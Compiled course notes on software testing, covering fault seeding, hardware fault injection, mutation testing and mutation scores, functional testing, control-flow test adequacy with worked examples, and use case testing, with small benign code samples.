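The estimate is a few lines of arithmetic; the sketch below assumes, as stated, that seeded and natural faults are equally easy to detect, and the numbers are invented:

#include <stdio.h>

/* From DS / S = DN / N: total natural faults N = S * DN / DS,
   of which DN are already found, so N - DN remain. */
double natural_faults_remaining(int S, int DS, int DN) {
    double N = (double)S * DN / DS;
    return N - DN;
}

int main(void) {
    /* 100 seeded faults, 50 detected, alongside 12 natural faults
       detected: estimated 24 natural faults in total, 12 remaining. */
    printf("estimated natural faults remaining: %.1f\n",
           natural_faults_remaining(100, 50, 12));
    return 0;
}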

Hardware Fault-based Testing

Fault-based testing is widely used for semiconductor and hardware system validation and evaluation both for evaluating the quality of test suites and for evaluating fault tolerance.

Semiconductor testing has conventionally been aimed at detecting random errors in fabrication, rather than design faults. Relatively simple fault models have been developed for testing semiconductor memory devices, the prototypical faults being "stuck-at-0" and "stuck-at-1" (a gate, cell, or pin that produces the same logical value regardless of inputs). A number of more complex fault models have been developed for particular kinds of semiconductor devices (e.g., failures of simultaneous access in dual-port memories). A test vector (analogous to a test suite for software) can be judged by the number of hypothetical faults it can detect, as a fraction of all possible faults under the model.

Fabrication of a semiconductor device, or assembly of a hardware system, is more analogous to copying disk images than to programming. The closest analog of software is not the hardware device itself, but its design - in fact, a high-level design of a semiconductor device is essentially a program in a language that is compiled into silicon. Test and analysis of logic device designs faces the same problems as test and analysis of software, including the challenge of devising fault models. Hardware design verification also faces the added problem that it is much more expensive to replace faulty devices that have been delivered to customers than to deliver software patches.

In evaluation of fault tolerance in hardware, the usual approach is to modify the state or behavior rather than the program. Due to a difference in terminology between hardware and software testing, the corruption of state or modification of behavior is called a "fault," and artificially introducing it is called "fault injection." Pin-level fault injection consists of forcing a stuck-at-0, a stuck-at-1, or an intermediate voltage level (a level that is neither a logical 0 nor a logical 1) on a pin of a semiconductor device. Heavy ion radiation is also used to inject random faults in a running system. A third approach, growing in importance as hardware complexity increases, uses software to modify the state of a running system or to simulate faults in a running simulation of hardware logic design.

Fault seeding can be used statistically in another way: To estimate the number of faults remaining in a program. Usually we know only the number of faults that have been detected, and not the number that remains. However, again to the extent that the fault model is a valid statistical model of actual fault occurrence, we can estimate that the ratio of actual faults found to those still remaining should be similar to the ratio of seeded faults found to those still remaining.

Once again, the necessary assumptions are troubling, and one would be unwise to place too much confidence in an estimate of remaining faults. Nonetheless, a prediction with known weaknesses is better than a seat-of-the-pants guess, and a set of estimates derived in different ways is probably the best one can hope for.

While the focus of this chapter is on fault-based testing of software, related techniques can be applied to whole systems (hardware and software together) to evaluate fault tolerance. Some aspects of fault-based testing of hardware are discussed in the sidebar above.

Open Research Issues

Fault-based testing has yet to be widely applied in software development, although it is an important research tool for evaluating other test selection techniques. Its limited impact on software practice so far can be blamed perhaps partly on computational expense and partly on the lack of adequate support by industrial-strength tools.

One promising direction in fault-based testing is development of fault models for particular classes of faults. These could result in more sharply focused fault-based techniques, and also partly address concerns about the extent to which the fault models conventionally used in mutation testing are representative of real faults. Two areas in which researchers have attempted to develop focused models, expressed as sets of mutation operators, are component interfaces and concurrency constructs.

Particularly important is development of fault models based on actual, observed faults in software. These are almost certainly dependent on application domain and perhaps to some extent also vary across software development organizations, but too little empirical evidence is available on the degree of variability.


Mutation Testing Mutation testing (or mutation analysis, or program mutation) is a method of software testing in which the program or source code is deliberately manipulated and a suite of tests is then run against the mutated code. The mutations introduced to the source code are designed to imitate common programming errors. A good unit test suite typically detects the program mutations and fails accordingly. Mutation testing is used on many different platforms, including Java, C++, C# and Ruby.

Mutation testing offers the following advantages:

• Program code fault identification
• Effective test case development
• Detection of loopholes in test data
• Improved software program quality
• Elimination of code ambiguity

Disadvantages of mutation testing include:

• Difficult implementation of complex mutations
• Expensive and time-consuming
• Requires skilled testers with programming knowledge

Mutation testing (or mutation analysis or program mutation) is used to design new software tests and evaluate the quality of existing software tests. Mutation testing involves modifying a program in small ways.[1] Each mutated version is called a mutant, and tests detect and reject mutants by exposing differences in behavior between the original version and the mutant. This is called killing the mutant. Test suites are measured by the percentage of mutants that they kill. New tests can be designed to kill additional mutants. Mutants are based on well-defined mutation operators that either mimic typical programming errors (such as using the wrong operator or variable name) or force the creation of valuable tests (such as dividing each expression by zero). The purpose is to help the tester develop effective tests or locate weaknesses in the test data used for the program or in sections of the code that are seldom or never accessed during execution.

Goal

Tests can be created to verify the correctness of the implementation of a given software system, but the creation of tests still poses the question whether the tests are correct and sufficiently cover the requirements that have originated the implementation. (This technological problem is itself an instance of a deeper philosophical problem named "Quis custodiet ipsos custodes?" ["Who will guard the guards?"].) In this context, mutation testing was pioneered in the 1970s to locate and expose weaknesses in test suites. The theory was that if a mutant was introduced without the behavior (generally output) of the program being affected, this indicated either that the code that had been mutated was never executed (dead code) or that the test suite was unable to locate the faults represented by the mutant. For this to function at any scale, a large number of mutants usually are introduced into a large program, leading to the compilation and execution of an extremely large number of copies of the program. This problem of the expense of mutation testing has reduced its practical use as a method of software testing, but the increased use of object-oriented programming languages and unit testing frameworks has led to the creation of mutation testing tools for many programming languages as a way to test individual portions of an application.

Mutation testing overview

Mutation testing is based on two hypotheses. The first is the competent programmer hypothesis. This hypothesis states that most software faults introduced by experienced programmers are due to small syntactic errors.[1] The second hypothesis is called the coupling effect. The coupling effect asserts that simple faults can cascade or couple to form other emergent faults.

Subtle and important faults are also revealed by higher-order mutants, which further supports the coupling effect. Higher-order mutants are created by applying more than one mutation to a program.

Mutation testing is done by selecting a set of mutation operators and then applying them to the source program one at a time for each applicable piece of the source code. The result of applying one mutation operator to the program is called a mutant. If the test suite is able to detect the change (i.e. one of the tests fails), then the mutant is said to be killed.

For example, consider the following C++ code fragment:

if (a && b) {
    c = 1;
} else {
    c = 0;
}

The condition mutation operator would replace && with || and produce the following mutant:

if (a || b) {
    c = 1;
} else {
    c = 0;
}

Now, for a test to kill this mutant, the following three conditions should be met:

1. A test must reach the mutated statement.
2. Test input data should infect the program state by causing different program states for the mutant and the original program. For example, a test with a = 1 and b = 0 would do this.
3. The incorrect program state (the value of 'c') must propagate to the program's output and be checked by the test.

These conditions are collectively called the RIP model.
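To make the three conditions concrete, here is a minimal, self-contained sketch in C: the original and mutant fragments are wrapped as functions (an invented harness, not part of the example above), and the test a = 1, b = 0 kills the mutant:

#include <assert.h>

/* Original fragment, wrapped as a function. */
int original(int a, int b) { int c; if (a && b) c = 1; else c = 0; return c; }

/* Mutant produced by the condition mutation operator. */
int mutant(int a, int b)   { int c; if (a || b) c = 1; else c = 0; return c; }

int main(void) {
    /* a = 1, b = 0: reaches the mutated condition (R), infects the
       state: the original computes c = 0 while the mutant computes
       c = 1 (I), and the value propagates to the checked result (P). */
    assert(original(1, 0) == 0);  /* passes on the original program */
    assert(mutant(1, 0) == 0);    /* fails, i.e. the mutant is killed */
    return 0;
}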

Weak mutation testing (or weak mutation coverage) requires that only the first and second conditions are satisfied. Strong mutation testing requires that all three conditions are satisfied. Strong mutation is more powerful, since it ensures that the test suite can really catch the problems. Weak mutation is closely related to code coverage methods. It requires much less computing power to ensure that the test suite satisfies weak mutation testing than strong mutation testing.

However, there are cases where it is not possible to find a test case that could kill a given mutant, because the resulting program is behaviorally equivalent to the original one. Such mutants are called equivalent mutants.

Mutation operators

Many mutation operators have been explored by researchers. Here are some examples of mutation operators for imperative languages:

• Statement deletion
• Statement duplication or insertion, e.g. goto fail;
• Replacement of boolean subexpressions with true and false
• Replacement of some arithmetic operations with others, e.g. + with *, - with /
• Replacement of some boolean relations with others, e.g. > with >=, == and <=
• Replacement of variables with others from the same scope (variable types must be compatible)

The resulting adequacy measure is the mutation score:

    mutation score = number of mutants killed / total number of mutants
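As a minimal sketch (in C, with invented numbers), the score computation is a one-line ratio; a variant that excludes equivalent mutants, which can never be killed, is also shown:

#include <stdio.h>

/* The basic score from the formula above. */
double mutation_score(int killed, int total) {
    return (double)killed / total;
}

/* A refinement that excludes equivalent mutants, which can never
   be killed (see the note on equivalent mutants above). */
double adjusted_score(int killed, int total, int equivalent) {
    return (double)killed / (total - equivalent);
}

int main(void) {
    /* Invented run: 18 of 25 mutants killed, 5 judged equivalent. */
    printf("raw score:      %.2f\n", mutation_score(18, 25));     /* 0.72 */
    printf("adjusted score: %.2f\n", adjusted_score(18, 25, 5));  /* 0.90 */
    return 0;
}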

These mutation operators are also called traditional mutation operators. There are also mutation operators for object-oriented languages, for concurrent constructions, for complex objects like containers, and so on. Operators for containers are called class-level mutation operators. For example, the muJava tool offers various class-level mutation operators such as Access Modifier Change, Type Cast Operator Insertion, and Type Cast Operator Deletion. Mutation operators have also been developed to perform security vulnerability testing of programs.

What is Mutation Testing

Introduction

As the demand for software grows, so does the complexity of its design. The more complex the software, the greater the needs for testing, quality assurance, and customer satisfaction. Although testing is an integral part of the software development process, the question of what constitutes sufficient or adequate testing is still open.

If your tests cannot find a bug, can you conclude that there are no bugs? Can you trust your unit tests? How do you assess the tests themselves? Mutation testing is one technique that allows you to assess your tests. It involves deliberately altering, modifying, or changing program code, and then rerunning a suite of passing unit tests against the mutated program.

In a nutshell, mutation testing works in the following manner. Initially, you start with a piece of production code that the unit tests cover properly. Once you ascertain that all tests pass for the given code, you can start applying mutations to the target assembly.

Testing means additional cost and lower productivity, so for optimal development, quality testing methods must be improved continuously. Testing coverage - how well you test the software - is an important issue in software development. When do you stop testing? What is "adequate" testing? Right now, the most common practice is to state a percentage-coverage requirement such as "a minimum of xyz% coverage". You will need to balance quality and customer satisfaction against productivity and cost.

Another important question to consider is: how extensive are the testing programs? What backs the "xyz% coverage" claim? What determines that at least xyz% of all possible causes of errors, bugs, or failures is covered by the existing testing methods? Mutation testing is one way to verify that the software tester performed the testing properly. Through mutation testing, it can be determined whether the set of testing methods used in the development process was appropriate and adequate to ensure product quality.

What is Mutation Testing?

To determine the correctness of a testing program, you need to observe its behavior for each test case. If no faults are detected, the program is correct, or at least it passes the test. A test case is a set of input values to the program under test together with the corresponding expected output values.

Mutation testing is a method or strategy to check the effectiveness or accuracy of a testing program in detecting faults in the system or program under test. It is so called because mutants of the software are created and run against the test cases.

Experts also call mutation testing a fault-based testing strategy, because the mutants are created by introducing a single fault into the original program. Any number of mutants can be created. There are other versions of mutation testing, but they rely on the same method - mutating the original software.

Some of the other versions are weak mutation, interface mutation, and specification-based mutation. Mutation testing is not a new method; developers have known about it since the late 1970s. However, it has been used more in research and educational institutions than in the industrial software domain.

Mutation Testing Procedure

The traditional mutation process involves the following steps:

Create mutant software

The system/program under test is modified by rewriting the source code to introduce a single fault. The new versions of the system/program are mutants of the original. Each mutant has one fault that distinguishes it from the original software and from the other mutants. The tester may create as many mutants as needed; there is no limit.

Prepare test cases for input to the original and mutant software

The test cases should be planned for the detection of the fault introduced into the mutant software. The tester may improve the test cases, if necessary, so that the fault in the mutant software is found.

Apply test cases to original software

For the original software, the output is supposed to be correct, i.e., it must match the expected output. If it does not, there is an error in the application, which must be fixed. Apply the test cases again until there are no bugs.

Apply test cases to mutant software

After testing the original software, apply the same test cases to the mutant software. If the output differs from the output of the original software, label the mutant as dead. Continue to apply the other test cases to the mutant software and record the results. Dead mutants are no longer tested with the rest of the test set.
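The bookkeeping behind these steps can be sketched as a small driver loop. Everything below is hypothetical scaffolding (the output_differs table stands in for actually executing the original and each mutant), not the interface of any real mutation tool:

#include <stdio.h>

#define NUM_MUTANTS 4
#define NUM_TESTS   3

/* output_differs[m][t] is 1 when mutant m's output differs from the
   original's on test t; in a real harness this entry would come from
   actually executing both versions. */
static const int output_differs[NUM_MUTANTS][NUM_TESTS] = {
    {0, 1, 0},   /* mutant 0: killed by test 1 */
    {0, 0, 0},   /* mutant 1: never killed (live, possibly equivalent) */
    {1, 0, 1},   /* mutant 2: killed by test 0 */
    {0, 0, 1},   /* mutant 3: killed by test 2 */
};

int main(void) {
    int dead[NUM_MUTANTS] = {0};
    for (int m = 0; m < NUM_MUTANTS; m++) {
        /* Dead mutants are not run against the remaining tests. */
        for (int t = 0; t < NUM_TESTS && !dead[m]; t++)
            if (output_differs[m][t])
                dead[m] = 1;
        printf("mutant %d: %s\n", m, dead[m] ? "dead" : "live");
    }
    return 0;
}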


Compute mutation score

Mutation score is the ratio of the number of dead mutants to the number of nonequivalent mutants. The goal is to have a score of one (1), which means that the faults in all nonequivalent mutants have been detected; the more dead mutants, the higher the score.

Mutation Analysis of Results

The interpretation of the testing results is discussed below (Mutation Score Analysis).

Mutation Score Analysis

Using the mutation score formula, if you find that the score is below one (1), you should analyze the data, because it indicates the status of the testing performed.

The indicators can be interpreted as follows:

The mutation testing result can be used as a reference for the effectiveness of the test cases or test suite. The mutation score is directly proportional to the effectiveness of the test cases or test suite. If the score is close to or almost one, it indicates that the faults in a high percentage of mutants were detected. Equivalent mutants produce the same outputs as the original program and so can never be killed; note that they are not included in the mutation score formula.

Live, nonequivalent mutants indicate that the test cases are not adequate and need further improvement. Probably the tests did not exercise the code where the fault was introduced. The tester should investigate and write a new test case if necessary. After improving the test cases, the tester may repeat the procedure until a satisfactory mutation score is attained. What counts as a satisfactory mutation score is defined by the testing group's management.

The mutation score can also be a good reference point for measuring the effectiveness of the steps taken to improve the test cases or suite. Mutation testing does not pass or fail the program under test. It just gives indicators to guide the testers on the improvements that need to be implemented.

Mutation testing adds trust and fidelity to your software testing process. This will eventually help you create a software application that can pass the other test procedures.

Mutation Testing Advantages and Disadvantages

Mutation testing helps the tester assess the quality of a test suite. This is done by mutating certain elements of the software in the source code and later checking whether the test code is able to detect the introduced errors. However, mutation testing is very costly to run, especially on very large software applications.

Mutation testing is also a powerful tool for detecting testing inadequacies and for checking the coverage of testing software. Software testers have known this method for many years, yet few use it; several factors impede the software industry from adopting it. The method has its own share of advantages and disadvantages, a few of which are listed below:

Advantages

• A powerful tool to determine the coverage of testing programs.
• Many steps are automated, such as the creation of mutant software and white-box unit testing.
• It is capable of comprehensive testing of correctly chosen mutant programs.

Disadvantages

• Any number of mutants can be created, and testing them is always costly and time-consuming.
• It requires many test cases to distinguish mutants from the original software.
• It requires a lot of testing before dependable data is obtained.
• It needs an automated tool to reduce testing time.
• It is not an applicable method for black-box testing.
• It is very complicated to use without an automated tool.

The disadvantages listed above are the reasons why mutation testing has not really spread beyond research. The following are what software developers want for the future of mutation testing.

Automation of Mutation Testing

As mentioned earlier, mutation testing is complicated and requires numerous test runs to obtain the needed data. Unlike research, where mutation testing has been used for decades, industry faces stiff delivery dates and compelling cost targets, so automation is essential.

More researchers and users of the testing process are always needed. A larger number of users means more new developments and observations that can improve the usability of the method.

To get reliable results, better methods are needed to identify equivalent mutants and to reduce the number of tests. More equivalent mutants mean a longer testing time.


Conclusion

Mutation testing is a misnomer. It is not just a testing method; it is more of an analytical method. Based on the set guidelines, the tester analyzes the results and implements the appropriate corrective measures.

Unlike the other testing methods, there is no pass/fail disposition if the output fails to meet the standard output defined in the test cases. Instead, adjustments are made to improve whatever was lacking or not up to standard, and the test is repeated until a satisfactory score is attained.

In real life, 100% average testing effectiveness is not attainable; 100% can be achieved for a day or two, but not for several days, and certainly not on average over weeks or months.

Mutation testing is an effective method for improving the quality of testing software, but its widespread use is prevented by the difficulties encountered in applying it. It would be very helpful to the developers of complex software if the testing method could be improved to the point where it is not only effective in fault detection but also efficient.


UNIT V - FUNCTIONAL TESTING

Introduction

Functional testing is a quality assurance (QA) process and a type of black-box testing that bases its test cases on the specifications of the software component under test. Functions are tested by feeding them input and examining the output; internal program structure is rarely considered (unlike in white-box testing). Functional testing usually describes what the system does.

Functional testing differs from system testing in that functional testing "verifies a program by checking it against ... design document(s) or specification(s)", while system testing "validate[s] a program by checking it against the published user or system requirements". Functional testing has many types:

• Smoke Testing
• Sanity Testing
• Regression Testing
• Usability Testing

Six steps

Functional testing typically involves six steps:

1. The identification of functions that the software is expected to perform
2. The creation of input data based on the function's specifications
3. The determination of output based on the function's specifications
4. The execution of the test case
5. The comparison of actual and expected outputs
6. A check of whether the application works as per the customer's needs
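A minimal sketch of these six steps in C, for a hypothetical add() function (the names and expected values are invented for illustration):

#include <stdio.h>

/* Step 1: a function the software is expected to perform. */
int add(int x, int y) { return x + y; }

int main(void) {
    int input_x = 2, input_y = 3;   /* Step 2: input data from the spec */
    int expected = 5;               /* Step 3: output from the spec     */
    int actual = add(input_x, input_y);         /* Step 4: execute      */
    if (actual == expected)                     /* Step 5: compare      */
        printf("PASS: works as the customer needs\n");  /* Step 6      */
    else
        printf("FAIL: expected %d, got %d\n", expected, actual);
    return 0;
}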

In functional testing, the functions of a component or system are tested. It refers to activities that verify a specific action or function of the code. Functional tests tend to answer questions like "can the user do this?" or "does this particular feature work?". This is typically described in a requirements specification or in a functional specification.


The techniques used for functional testing are often specification-based. Testing functionality can be done from two perspectives:

• Requirement-based testing: In this type of testing the requirements are prioritized depending on the risk criteria and accordingly the tests are prioritized. This will ensure that the most important and most critical tests are included in the testing effort.

• Business-process-based testing: In this type of testing the scenarios involved in the day-to-day business use of the system are described. It uses knowledge of the business processes. For example, a personnel and payroll system may have a business process along the lines of: someone joins the company, the employee is paid on a regular basis, and the employee finally leaves the company.

DEFINITION

Functional Testing is a type of software testing whereby the system is tested against the functional requirements/specifications.

ELABORATION

Functions (or features) are tested by feeding them input and examining the output. Functional testing ensures that the requirements are properly satisfied by the application. This type of testing is not concerned with how processing occurs, but rather, with the results of processing.

During functional testing, Black Box Testing technique is used in which the internal logic of the system being tested is not known to the tester.

Functional testing is normally performed during the levels of System Testing and Acceptance Testing.

Typically, functional testing involves the following steps:

• Identify functions that the software is expected to perform.
• Create input data based on the function's specifications.
• Determine the output based on the function's specifications.
• Execute the test case.
• Compare the actual and expected outputs.

ADVANTAGES

• It simulates actual system usage.
• It does not make any system structure assumptions.


DISADVANTAGES

• It has a potential of missing logical errors in software.
• It has a high possibility of redundant testing.

NOTE

Functional testing is more effective when the test conditions are created directly from user/business requirements. When test conditions are created from the system documentation (system requirements/ design documents), the defects in that documentation will not be detected through testing and this may be the cause of end-users’ wrath when they finally use the software.

What is non Functional Testing?

Non-functional testing is the type of testing done against the non-functional requirements. It covers criteria that are not considered in functional testing and is used to check the readiness of a system. Non-functional requirements tend to be those that reflect the quality of the product, particularly from the suitability perspective of its users. Non-functional testing can be started after the completion of functional testing, and it can be made more effective by using testing tools.

It is the testing of software attributes which are not related to any specific function or user action, such as performance, scalability, security, or the behavior of the application under certain constraints.

Non-functional testing has a great influence on customer and user satisfaction with the product. Non-functional requirements should be expressed in a testable way; requirements like "the system should be fast" or "the system should be easy to operate" are not testable.

Basically, non-functional testing is used to measure the non-functional attributes of software systems. Examples of non-functional requirements: how much time does the software take to complete a task? How fast is the response?

What do you test in Functional Testing?

The prime objective of functional testing is checking the functionalities of the software system. It mainly concentrates on:

• Mainline functions: Testing the main functions of an application
• Basic Usability: Basic usability testing of the system; it checks whether a user can freely navigate through the screens without any difficulties
• Accessibility: Checks the accessibility of the system for the user
• Error Conditions: Use of testing techniques to check for error conditions; it checks whether suitable error messages are displayed


Test adequacy criteria

Specifies requirements for testing

Can be used as stopping rule: stop testing if 100% of the statements have been tested

Can be used as measurement: a test set that covers 80% of the statements is better than one which covers 70%

Can be used as test case generator: look for a test which exercises some statements not covered by the tests so far

A given test adequacy criterion and the associated test technique are opposite sides of the same coin


Test Adequacy Assessment Using Control Flow and Data Flow

15.1. Test Adequacy: Basics

15.1.1. What is test adequacy?

Consider a program P written to meet a set R of functional requirements. We notate such a P and R as (P, R). Let R contain n requirements labeled R1, R2, ..., Rn. Suppose now that a set T containing k tests has been constructed to test P to determine whether or not it meets all the requirements in R. Also, P has been executed against each test in T and has produced correct behavior. We now ask: Is T good enough? This question can be stated differently as: Has P been tested thoroughly?, or as: Is T adequate? Regardless of how the question is stated, it assumes importance when one wants to test P thoroughly in the hope that all errors have been discovered and removed when testing is declared complete and the program P declared usable by the intended users.

In the context of software testing, the terms "thorough," "good enough," and "adequate," used in the questions above, have the same meaning. We prefer the term "adequate" and the question Is T adequate? Adequacy is measured for a given test set designed to test P to determine whether or not P meets its requirements. This measurement is done against a given criterion C. A test set is considered adequate with respect to criterion C when it satisfies C. The determination of whether or not a test set T for program P satisfies criterion C depends on the criterion itself and is explained later in this chapter.

In this chapter we focus only on functional requirements; testing techniques to validate nonfunctional requirements are dealt with elsewhere.

EXAMPLE 15.1. Consider the problem of writing a program named sumProduct that meets the following requirements:

R1: Input two integers, say x and y, from the standard input device.

R2.1: Find and print to the standard output device the sum of x and y if x < y.

R2.2: Find and print to the standard output device the product of x and y if x ≥ y.

Suppose now that the test adequacy criterion C is specified as follows:

C: A test set T for program (P, R) is considered adequate if for each requirement r in R there is at least one test case in T that tests the correctness of P with respect to r.

It is obvious that T = {t: <x = 2, y = 3>} is inadequate with respect to C for program sumProduct. The lone test case t in T tests R1 and R2.1, but not R2.2.

15.1.2. Measurement of test adequacy

Adequacy of a test set is measured against a finite set of elements. Depending on the adequacy criterion of interest, these elements are derived from the requirements or from the program under test. For each adequacy criterion C, we derive a finite set known as the coverage domain and denoted as Ce.

A criterion C is a white-box test adequacy criterion if the corresponding coverage domain Ce depends solely on program P under test. A criterion C is a black-box test adequacy criterion if the corresponding coverage domain Ce depends solely on requirements R for the program P under test. All other test adequacy criteria are of a mixed nature and are not considered in this chapter. This chapter introduces several white-box test adequacy criteria that are based on the flow of control and the flow of data within the program under test.

Suppose that it is desired to measure the adequacy of T. Given that Ce has n ≥ 0 elements, we say that T covers Ce if for each element e′ in Ce there is at least one test case in T that tests e′. T is considered adequate with respect to C if it covers all elements in the coverage domain. T is considered inadequate with respect to C if it covers k elements of Ce where k < n. The fraction k/n is a measure of the extent to which T is adequate with respect to C. This fraction is also known as the coverage of T with respect to C, P, and R.

The determination of when an element e is considered tested by T depends on e and P and is explained below through examples.

EXAMPLE 15.2. Consider the program P, test set T, and adequacy criterion C of Example 15.1. In this case the finite set of elements Ce is the set {R1, R2.1, R2.2}. T covers R1 and R2.1 but not R2.2. Hence T is not adequate with respect to C. The coverage of T with respect to C, P, and R is 0.66. Element R2.2 is not tested by T whereas the other elements of Ce are tested.

EXAMPLE 15.3. Next let us consider a different test adequacy criterion, referred to as the path coverage criterion.




C: A test set T for program (P, R) is considered adequate if each path in P is traversed at least once.

Given the requirements in Example 15.1, let us assume that P has exactly two paths, one corresponding to condition x < y and the other to x ≥ y. Let us refer to these two paths as p1 and p2, respectively. For the given adequacy criterion C we obtain the coverage domain Ce to be the set {p1, p2}.

To measure the adequacy of T of Example 15.1 against C, we execute P against each test case in T. As T contains only one test, for which x < y, only the path p1 is executed. Thus the coverage of T with respect to C, P, and R is 0.5, and hence T is not adequate with respect to C. We also say that p2 is not tested.
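The same style of measurement applies to the path coverage criterion: the path executed by a test is identified by the outcome of the branch x < y. A small illustrative Python sketch, assuming the correct two-path program:

# Illustrative sketch: path coverage for the two-path sumProduct program.

def executed_path(x, y):
    # p1 is the path taken when x < y, p2 when x >= y.
    return "p1" if x < y else "p2"

def path_coverage(tests):
    traversed = {executed_path(x, y) for (x, y) in tests}
    return len(traversed) / 2       # coverage domain Ce = {p1, p2}

print(path_coverage([(2, 3)]))          # 0.5 : p2 not tested
print(path_coverage([(2, 3), (3, 1)]))  # 1.0 : adequate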

In Example 15.3 we assumed that P contains exactly two paths. This assumption is based on a knowledge of the requirements. However, when the coverage domain must contain elements from the code, these elements must be derived by program analysis and not by an examination of its requirements. Errors in the program and incomplete or incorrect requirements might cause the program, and hence the coverage domain, to be different from what one might expect.

EXAMPLE 15.4. Consider the following program written to meet the requirements specified in Example 15.1; the program is obviously incorrect.

Program P15.1

begin
  int x, y, sum;
  input(x, y);
  sum = x + y;
  output(sum);
end

The above program has exactly one path, which we denote as p1. This path traverses all statements. Thus, to evaluate any test with respect to criterion C of Example 15.3, we obtain the coverage domain Ce to be {p1}. It is easy to see that Ce is covered when P is executed against the sole test in T of Example 15.1. Thus T is adequate with respect to C even though the program is incorrect.

Program P15.1 has an error that is often referred to as a “missing path” or a “missing condition” error. A correct program that meets the requirements of Example 15.1 follows.

Program P15.2

begin
  int x, y;
  input(x, y);
  if (x < y) then
    output(x + y);
  else
    output(x * y);
end

This program has two paths, one of which is traversed when x < y and the other when x ≥ y. Denoting these two paths by p1 and p2, we obtain the coverage domain given in Example 15.3. As mentioned earlier, test T of Example 15.1 is not adequate with respect to the path coverage criterion.

The above example illustrates that an adequate test set might not reveal even the most obvious error in a program. This does not diminish in any way the need for the measurement of test adequacy. The next section explains the use of adequacy measurement as a tool for test enhancement.

15.1.3. Test enhancement using measurements of adequacy

While a test set adequate with respect to some criterion does not guarantee an error-free program, an inadequate test set is a cause for worry. Inadequacy with respect to any criterion often implies deficiency. Identification of this deficiency helps in the enhancement of the inadequate test set. Enhancement, in turn, is also likely to test the program in ways it has not been tested before, such as testing untested portions or testing features in a sequence different from the one used previously. Testing the program differently than before raises the possibility of discovering errors that have so far gone undetected.

EXAMPLE 15.5. Let us reexamine test T for P15.2 in Example 15.4. To make T adequate with respect to the path coverage criterion, we need to add a test that covers p2. One test that does so is {< x = 3, y = 1 >}. Adding this test to T and denoting the expanded test set by T′, we get:

T′ = {< x = 2, y = 3 >, < x = 3, y = 1 >}.

When P15.2 is executed against the two tests in T′, both paths p1 and p2 are traversed. Thus T′ is adequate with respect to the path coverage criterion.

Given a test set T for program P, test enhancement is a process that depends on the test process employed in the organization. For each new test added to T, P needs to be executed to determine its behavior. An erroneous behavior implies the existence of an error in P and will likely lead to debugging of P and the eventual removal of the error. However, there are several procedures by which the enhancement could be carried out. One such procedure follows.

Procedure for Test Enhancement Using Measurements of Test Adequacy.

Step 1 Measure the adequacy of T with respect to the given criterion C. If T is adequate then go to Step 3, otherwise execute the next step. Note that during adequacy measurement we will be able to determine the uncovered elements of Ce.

Step 2 For each uncovered element e ∈ Ce, do the following until e is covered or is determined to be infeasible.


2.1 Construct a test t that covers e or will likely cover e.

2.2 Execute P against t .

2.2.1 If P behaves incorrectly then we have discovered the existence of an error in P. In this case t is added to T, the error is removed from P, and this procedure is repeated from the beginning.

2.2.2 If P behaves correctly and e is covered then t is added to T; otherwise it is the tester's option whether to ignore t or to add it to T.

Step 3 Test enhancement is complete.

End of Procedure
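The procedure can be rendered schematically in code. In the following Python sketch the helper functions passed in are hypothetical placeholders for the activities the procedure describes (adequacy measurement, test construction, the oracle check, and debugging); it is a schematic rendering under those assumptions, not a complete implementation:

# Schematic sketch of the test-enhancement procedure. The helpers
# uncovered_elements, generate_test_for, behaves_correctly and fix_error
# are hypothetical placeholders supplied by the caller.

def enhance(T, P, uncovered_elements, generate_test_for,
            behaves_correctly, fix_error):
    while True:
        uncovered = uncovered_elements(T, P)    # Step 1: measure adequacy
        if not uncovered:
            return T, P                         # Step 3: enhancement complete
        for e in uncovered:
            t = generate_test_for(e)            # 2.1: construct a test for e
            if t is None:                       # e judged infeasible
                continue
            if not behaves_correctly(P, t):     # 2.2.1: error discovered
                T.append(t)
                P = fix_error(P, t)             # debug, then restart at Step 1
                break
            T.append(t)                         # 2.2.2: keep t (e covered)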

Figure 15.1 shows a sample test construction-enhancement cycle. The cycle begins with the construction of a non-empty set T of test cases. These test cases are constructed from the requirements of program P under test. P is then executed against all test cases. P is corrected if it does not behave as per the requirements on any test case. The adequacy of T is measured with respect to a suitably selected adequacy criterion C after P is found to behave satisfactorily on all elements of T. This construction-enhancement cycle is considered complete if T is found adequate with respect to C. If not, then additional test cases are constructed in an attempt to remove the deficiency. The construction of these additional test cases once again makes use of the requirements that P must meet.

EXAMPLE 15.6. Consider the following program intended to compute x^y given integers x and y. For y < 0 the program skips the computation and outputs a suitable error message.

Program P15.3

begin
  int x, y;
  int product, count;
  input(x, y);
  if (y ≥ 0) {
    product = 1; count = y;
    while (count > 0) {
      product = product * x;
      count = count - 1;
    }
    output(product);
  }
  else
    output("Input does not match its specification.");
end

Next, consider the following test adequacy criterion.


Test cases from use cases (Use Case Testing)

Use case testing is a technique that helps us identify test cases that exercise the whole system on a transaction-by-transaction basis from start to finish. Test cases are derived from the use case document; in other words, use case testing is end-to-end testing of the system as a whole, based on transactions. It tests with the vision of a user rather than on the basis of inputs and outputs, and it exercises real transactions.

• A use case is a description of a particular use of the system by an actor (a user of the system). Each use case describes the interactions the actor has with the system in order to achieve a specific task (or, at least, produce something of value to the user).

• Actors are generally people, but they may also be other systems.

• Use cases are a sequence of steps that describe the interactions between the actor and the system. Use cases are defined in terms of the actor, not the system, describing what the actor does and what the actor sees rather than what inputs the system expects and what the system outputs.

• Use cases use the language and terms of the business rather than technical terms, especially when the actor is a business user.

• Each use case must specify any preconditions that need to be met for the use case to work. Use cases must also specify postconditions: observable results and a description of the final state of the system after the use case has been executed successfully.

• Use cases serve as the foundation for developing test cases, mostly at the system and acceptance testing levels.

• Use cases can uncover integration defects, that is, defects caused by the incorrect interaction between different components. Used in this way, the actor may be something that the system interfaces to, such as a communication link or sub-system.

• Use cases describe the process flows through a system based on its most likely use. This makes the test cases derived from use cases particularly good for finding defects in the real-world use of the system (i.e. the defects that the users are most likely to come across when first using the system).

• Each use case usually has a mainstream (or most likely) scenario and sometimes additional alternative branches (covering, for example, special cases or exceptional conditions).


The ATM PIN example is shown below in Figure 4.3, with both successful and unsuccessful scenarios. In this diagram we can see the interactions between A (the actor, in this case a human being) and S (the system). Steps 1 to 5 form the success scenario: the card and PIN are both validated and the actor is allowed to access the account. The extensions cover three other cases, 2a, 4a and 4b, shown in the diagram below.

For use case testing, we would have one test for the success scenario and one test for each extension. In this example, we may give extension 4b a higher priority than 4a from a security point of view.

System requirements can also be specified as a set of use cases. This approach can make it easier to involve the users in the requirements gathering and definition process.

What is a Use Case?

1. A use case is a description of a particular use of the system by the end user of the system.

2. Use cases are a sequence of steps that describe the interactions between the user and the software system.

3. Each use case describes the interactions the end user has with the software system in order to achieve a specific task.

